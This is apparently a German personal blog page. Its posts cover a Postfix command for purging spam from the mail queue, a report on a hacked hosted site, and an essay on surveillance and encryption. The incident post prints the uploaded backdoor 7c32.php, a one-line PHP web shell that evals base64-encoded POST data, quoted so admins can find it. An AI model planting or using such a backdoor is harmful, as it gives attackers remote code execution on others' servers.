Mit diesem Code kann man aus der Mailqueue von Postfix alle Mails einer bestimmten Adresse löschen. Das kann relevant werden, wenn euer Server ein Spamzombie geworden ist und noch einige tausend Mails in der Ausgangswarteschlange liegen, die nicht zugestellt werden konnten.
postqueue -p | awk 'BEGIN { RS = "" } { if($7 == "example@mail.com") print $1 }' | tr -d '*!' | postsuper -d -
Sortiert die Mail IDs aus der Warteschlange (postqueue -p) heraus und übergibt sie an postsuper zur Löschung.
Der Server auf dem dieses Blog läuft, hostet auch einige andere Webseiten. Eine davon wurde gehackt und hat die letzten Tage unglaubliche Mengen an Spammails versendet. Kann passieren und passiert tatsächlich auch recht oft. Nur dieses Mal war es einfach eine Datei namens 7c32.php, die per FTP hochgeladen wurde und keine Sicherheitslücke von WordPress oder was auch immer man so laufen hat. Davor eine Datei ftpchk3.php um zu prüfen, ob das FTP Verzeichnis auch per Web erreichbar ist.
Der Angreifer wusste also den Benutzernamen, das Passwort und auf welcher Domain dieses Skript laufen würde und hat das genutzt um mit der PHP Funktion mail() Spam zu verschicken. Mitgeschnitten in einem Wifi Netz? Gezielter Hack? Trojaner? Wir wissen es nicht.
Das scheint übrigens ein älterer und vermutlich automatisierter Angriff zu sein. Eine Googlesuche nach 7c32.php bringt einige viele Suchergebnisse, die zum Teil bis 2012 zurückreichen.
Wie dem auch sei … einfach mal in der eigenen Installation von was auch immer (WordPress, Joomla, Webseite mit PHP) nach einer Datei 7c32.php (im Unterverzeichnis css) suchen. Die Datei ftpchk3.php wurde vom Angreifer wieder gelöscht, laut Netz enthält sie aber auch nur den Code:
echo "OK"
Be safe!
P.S.: Der Inhalt von 7c32.php:
< ? php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));} ? >
Will er mich oder mein Frühstück anknabbern?
Bier nach Film und Musik aus drei verschiedenen Richtungen …
Ein Video ;-)
Es leuchtet blau.
Rambo
Ich teste gerade die verschiedenen Formatvorlagen von WordPress!
In der Hoffnung gegen Blogtiefschlaf und Sommerloch anzukämpfen habe ich mal auf das neue WordPress Theme Twenty Thirteen umgestellt. Sieht gut aus und hat einige Formatvorlagen, die ich hiermit mal ausprobiere. Das ist eine Kurzmitteilung ;-)
Wir werden totalüberwacht! Das ist Fakt und liegt auch daran, dass sich kaum jemand über Verschlüsselung Gedanken macht (meinen öffentlichen PGP Schlüssel findet ihr auf der Kontaktseite) und fröhlich Dienste von verschiedenen Webseiten nutzt.
Bei vielen Diensten kann man nichts dagegen unternehmen, denn wenn ich bei Amazon einkaufen möchte, dann muss ich mit deren Webseite interagieren. Möchte ich Google Dienste wie App Engine nutzen oder einen anderen Hosting Dienst ist das ebenso der Fall. In diesem Fall kann ich allerdings auf dem Server alles verschlüsselt ablegen (sofern er nur als Speicher verwendet wird, wenn er die Daten verarbeiten soll, geht das natürlich nicht komplett).
Kommen wir langsam zum Punkt. E-Mails, Instant Messaging, Telefongespräche, Terminplan, Datenspeicher … kann man das sicher – also verschlüsselt – und ohne „Cloud“ benutzen?
Es wäre also möglich die Kommunikation mit seinen Mitmenschen komplett abhörsicher ablaufen zu lassen und ich bin mir sicher, dass die wirklich bösen Buben schon schlau genug sind ebenfalls abhörsicher zu kommunizieren. Die Überwachung trifft also nur Dumme und verletzt Grundrechte … und auch wenn es kein guter Vergleich ist, es ist ein wenig wie bei DRM: die bösen Raubkopierer kriegen davon nicht mit und der ehrliche Kunde hat nur Probleme damit und Einschränkungen ohne Ende.
Und wie seht ihr das? Kommunikation egal genug, dass sie komplett für spätere Ermittlungen aufgezeichnet werden darf (Stichwort: ich hab ja nichts zu verbergen … *würg*)? Oder doch vielleicht versuchen Freunde zu überzeugen ein wenig mehr darauf zu achten?
P.S.: Ausnahmen bestätigen die Regel oder so … bevor mir jemand damit kommt, dass ich hier blogge und auf Facebook, Instagram, Twitter, Google+ und in diversen Foren und Mailingslisten quasi-öffentlich schreibe und Bilder hochlade … ja, das ist aber gewollt so! Mag sein, dass man so auch ein Profil von einer Person erstellen kann, aber es fehlt ein ganz entscheidender Teil und über dessen Verteilung/Nutzung – wie man nun spätestens seit Snowden weiß – hat man keine Kontrolle mehr … außer Abschalten und die Kommunikation komplett einzustellen oder eben Verschlüsselung. Verstanden?